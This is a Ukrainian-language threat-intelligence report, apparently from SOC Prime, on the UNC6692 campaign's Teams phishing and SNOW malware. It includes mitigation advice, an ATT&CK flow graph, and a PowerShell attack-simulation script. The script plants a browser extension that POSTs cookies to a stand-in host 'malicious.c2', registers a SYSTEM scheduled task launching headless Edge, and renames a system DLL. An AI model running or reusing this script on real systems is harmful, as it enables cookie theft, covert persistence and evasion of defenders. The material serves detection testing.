UNC6692 розгортає нестандартне шкідливе ПЗ через соціальну інженерію

Ruslan Mikhalov Керівник досліджень загроз у SOC Prime

Стежити

UNC6692 розгортає нестандартне шкідливе ПЗ через соціальну інженерію

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

UNC6692 здійснила багатоступеневе проникнення, яке почалося з фішингового посилання, відправленого через Microsoft Teams, доставило шкідливий AutoHotKey-пейлоад і розгорнуло користувацький модульний набір шкідливих програм, відомих під назвою SNOW, включаючи SNOWBELT, SNOWGLAZE і SNOWBASIN. Операція також використовувала шахрайське розширення для браузера Chromium, утиліту тунелювання на основі Python і локальну HTTP-задню двері для забезпечення латеральних переміщень, крадіжки облікових даних і ексфільтрації даних через хмарні сервіси. Кампанія відзначилася ефективним зловживанням легітимною хмарною інфраструктурою та механізмами стійкості на основі браузера. Виявлення цієї активності вимагає ретельного моніторингу незвичайної поведінки розширень браузера, запланованих завдань, які запускають Edge в безголосому режимі, і підозрілих доступів до хмарних сервісів зберігання даних.

Розслідування

Група розвідки загроз Google виявила кампанію через аналіз записів чату Teams, захоплених сценаріїв AutoHotKey, конфігурацій запланованих завдань і мережевого трафіку, що включає AWS S3 і хостинговий на Heroku сервер WebSocket. Аналіз шкідливих програм виявив родину SNOW, її внутрішні компоненти, шаблони комунікації і використання атакантами PsExec разом з інструментами для зливу облікових даних. Слідчі також підтвердили крадіжку пам’яті LSASS і файлів бази даних Active Directory, які були ексфільтровані через LimeWire.

Пом’якшення

Захисники повинні застосовувати строгі політики білого списку для розширень браузера, моніторити запуск Microsoft Edge з параметрами безголового режиму або пов’язаними з розширенням, і блокувати доступ до непідтверджених кошиків AWS S3 і доменів Heroku. Впровадження багатофакторної аутентифікації для привілейованих облікових записів і відстеження виконання PsExec і доступу до LSASS можуть допомогти обмежити крадіжку облікових даних і латеральний рух. Заплановані завдання і ярлики на автозапуск повинні перевірятися регулярно для виявлення несанкціонованої стійкості.

Відповідь

Якщо виявлено будь-який компонент SNOW, негайно ізолюйте уражену систему, завершіть підозрілі процеси Edge і AutoHotKey, і зберіть пам’ять для судової експертизи, пов’язаної з LSASS. Блокуйте відомі домени керування і контролю та IP-адреси, видаліть шкідливі розширення браузера і змініть облікові дані для привілейованих облікових записів. Потім слід виконати повне мережеве сканування для виявлення додаткових скомпрометованих хостів разом з перевіркою запланованих завдань і елементів автозапуску на наявність стійкості.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef operator fill:#ff9900 %% Technique nodes tech_phishing["Technique – T1566.002 Phishing: Spearphishing Link via Microsoft Teams Description: Adversary delivers a malicious link through Microsoft Teams to target users."] class tech_phishing technique tech_user_exec["Technique – T1204.001 User Execution: Click malicious link Description: Victim clicks the malicious link, triggering execution."] class tech_user_exec technique tech_ahk["Technique – T1059.010 Command and Scripting Interpreter: AutoHotkey/AutoIT Description: Executes AutoHotkey binary and script to run further code."] class tech_ahk technique tech_python["Technique – T1059.006 Command and Scripting Interpreter: Python Description: Runs Python loaders for additional modules."] class tech_python technique tech_ext["Technique – T1176 Software Extensions: Install Chromium Extension Description: Installs a malicious browser extension to maintain persistence."] class tech_ext technique tech_schedtask["Technique – T1053.005 Scheduled Task: Launch Headless Edge Description: Creates scheduled tasks to start Edge with the malicious extension."] class tech_schedtask technique tech_shortcut["Technique – T1547.009 Shortcut Modification Description: Places a shortcut in the Startup folder for automatic execution."] class tech_shortcut technique tech_ingress["Technique – T1105 Ingress Tool Transfer Description: Downloads additional payloads such as SNOWGLAZE and SNOWBASIN."] class tech_ingress technique tech_obfuscate["Technique – T1027 Obfuscated Files or Information Description: Encodes payloads with Base64 and encrypts with AESu2011GCM."] class tech_obfuscate technique tech_archive["Technique – T1560 Archive Collected Data Description: Encrypts and stages data before exfiltration."] class tech_archive technique tech_encchannel["Technique – T1573.001 Encrypted Channel: Symmetric Cryptography Description: Uses AESu2011GCM for encrypted communications."] class tech_encchannel technique tech_tunnel["Technique – T1572 Protocol Tunneling Description: Establishes a WebSocket tunnel to a Heroku commandu2011andu2011control server."] class tech_tunnel technique tech_appproto["Technique – T1071.001 Application Layer Protocol: WebSocket Description: Communicates with C2 over WebSocket applicationu2011layer protocol."] class tech_appproto technique tech_proxy["Technique – T1090 Proxy Description: Utilizes the tunnel as a proxy to route traffic."] class tech_proxy technique tech_psexec["Technique – T1021.002 SMB/Windows Admin Shares: PsExec Description: Executes remote processes via SMB admin shares for lateral movement."] class tech_psexec technique tech_cred_dump["Technique – T1003 OS Credential Dumping Description: Extracts credentials from LSASS memory."] class tech_cred_dump technique tech_pass_hash["Technique – T1550.002 Pass the Hash Description: Uses captured NTLM hashes to authenticate to other systems."] class tech_pass_hash technique tech_rdp["Technique – T1021.001 Remote Desktop Protocol Description: Connects via RDP to backup server and domain controller."] class tech_rdp technique tech_exfil["Technique – T1567.002 Exfiltration to Cloud Storage Description: Uploads harvested AD database files to Amazon S3."] class tech_exfil technique %% Tool nodes tool_ahk_binary["Tool – Name: AutoHotkey binary Description: Executes compiled AHK scripts."] class tool_ahk_binary tool tool_python_runtime["Tool – Name: Python interpreter Description: Runs Python-based loaders."] class tool_python_runtime tool tool_edge_headless["Tool – Name: Microsoft Edge (headless) Description: Browser used to execute malicious extension."] class tool_edge_headless tool tool_snowglaze["Tool – Name: SNOWGLAZE loader Description: Downloads and launches additional modules."] class tool_snowglaze tool tool_snowbasin["Tool – Name: SNOWBASIN loader Description: Secondary loader used after SNOWGLAZE."] class tool_snowbasin tool tool_snowbelt_ext["Tool – Name: SNOWBELT Chromium extension Description: Provides persistence and data collection in the browser."] class tool_snowbelt_ext tool tool_psexec["Tool – Name: PsExec Description: Executes processes on remote Windows hosts via admin shares."] class tool_psexec tool %% Malware nodes malware_snowglaze["Malware – Name: SNOWGLAZE Description: Loader that creates WebSocket tunnel and encrypts traffic."] class malware_snowglaze malware malware_snowbasin["Malware – Name: SNOWBASIN Description: Secondary payload that assists in data staging."] class malware_snowbasin malware malware_snowbelt["Malware – Name: SNOWBELT extension Description: Chromium extension used for persistence and exfiltration."] class malware_snowbelt malware %% Attack flow connections tech_phishing –>|leads_to| tech_user_exec tech_user_exec –>|triggers| tech_ahk tech_ahk –>|uses| tool_ahk_binary tech_ahk –>|executes| tech_python tech_python –>|uses| tool_python_runtime tech_python –>|downloads| tool_snowglaze tech_python –>|downloads| tool_snowbasin tool_snowglaze –>|installs| malware_snowglaze tool_snowbasin –>|installs| malware_snowbasin malware_snowglaze –>|creates| tech_ext tech_ext –>|installs| tool_snowbelt_ext tool_snowbelt_ext –>|installs| malware_snowbelt tech_ext –>|enables| tech_schedtask tech_schedtask –>|launches| tool_edge_headless tech_ext –>|enables| tech_shortcut tech_shortcut –>|adds| op_shortcut_startup(("Startup shortcut")) class op_shortcut_startup operator tech_user_exec –>|downloads| tech_ingress tech_ingress –>|delivers| tech_obfuscate tech_obfuscate –>|prepares| tech_archive tech_archive –>|protects| tech_encchannel tech_encchannel –>|protects| tech_tunnel tech_tunnel –>|uses| tech_appproto tech_tunnel –>|acts_as| tech_proxy tech_proxy –>|routes| tech_psexec tech_psexec –>|uses| tool_psexec tool_psexec –>|executes| tech_cred_dump tech_cred_dump –>|provides| tech_pass_hash tech_pass_hash –>|enables| tech_rdp tech_rdp –>|connects_to| tech_exfil "

Потік атаки

Оповідь атаки та команди:
1. Мета: Встановити постійну, непомітну виконувальність Snowbelt на базі браузера на хості жертви.
2. Метод: Зареєструвати заплановане завдання, яке запускає Microsoft Edge у безголовому режимі з шкідливим розширенням Snowbelt (C:TempSnowbelt). Розширення завантажує шкідливий JavaScript, який контактує із C2 та ексфільтрує дані.
3. Індикатор очищення: Після запуску пейлоада атакант видаляє CoreUIComponents.dll з кешу DLL системи, щоб уникнути виявлення “здорового” процесу Edge; процес edge продовжує працювати, але модуль відсутній, задовольняючи другий пункт правила.

Регресійний тест-скрипт:

# Імітація UNC6692 – створює шкідливе заплановане завдання та запускає Edge без CoreUIComponents.dll
# -------------------------------------------------------------------------
# 1️⃣ Визначити змінні
$edgePath   = "$Env:ProgramFiles(x86)MicrosoftEdgeApplicationmsedge.exe"
$extPath    = "C:TempSnowbelt"
$taskName   = "SnowbeltEdgeTask"
$arguments  = "--headless --load-extension=`"$extPath`""
$taskUser   = "SYSTEM"

# 2️⃣ Забезпечити існування папки розширення (імітація пейлоада)
New-Item -ItemType Directory -Force -Path $extPath | Out-Null
Set-Content -Path "$extPathmanifest.json" -Value '{"name":"Snowbelt","version":"1.0","manifest_version":2,"background":{"scripts":["snow.js"]}}' -Encoding UTF8
Set-Content -Path "$extPathsnow.js" -Value 'fetch("http://malicious.c2/collect", {method:"POST", body:document.cookie});' -Encoding UTF8

# 3️⃣ Зареєструвати шкідливе заплановане завдання
$action  = New-ScheduledTaskAction -Execute $edgePath -Argument $arguments
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User $taskUser -Force

# 4️⃣ Запустити завдання негайно для генерації телеметрії
Start-ScheduledTask -TaskName $taskName

# 5️⃣ Видалити CoreUIComponents.dll з працюючого процесу Edge (імітація)
#    Примітка: у реальному середовищі це б вимагало хіджекінгу DLL або патчінгу пам'яті процесу.
#    Тут ми просто видаляємо файл, щоб перевірка списку завдань не виявила його.
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
if (Test-Path $dllPath) {
    Rename-Item -Path $dllPath -NewName "CoreUIComponents.dll.bak" -Force
}

# 6️⃣ Переконатися, що Edge працює, а DLL відсутня
$proc = Get-Process -Name "msedge" -ErrorAction SilentlyContinue
if ($proc) {
    Write-Host "Edge process PID $($proc.Id) launched with malicious extension."
}

Команди очищення:

# Видалити заплановане завдання
Unregister-ScheduledTask -TaskName "SnowbeltEdgeTask" -Confirm:$false

# Відновити CoreUIComponents.dll, якщо воно було перейменовано
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
$backup   = "$Env:SystemRootSystem32CoreUIComponents.dll.bak"
if (Test-Path $backup) {
    Rename-Item -Path $backup -NewName "CoreUIComponents.dll" -Force
}

# Видалити файли імітованого розширення
Remove-Item -Path "C:TempSnowbelt" -Recurse -Force

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно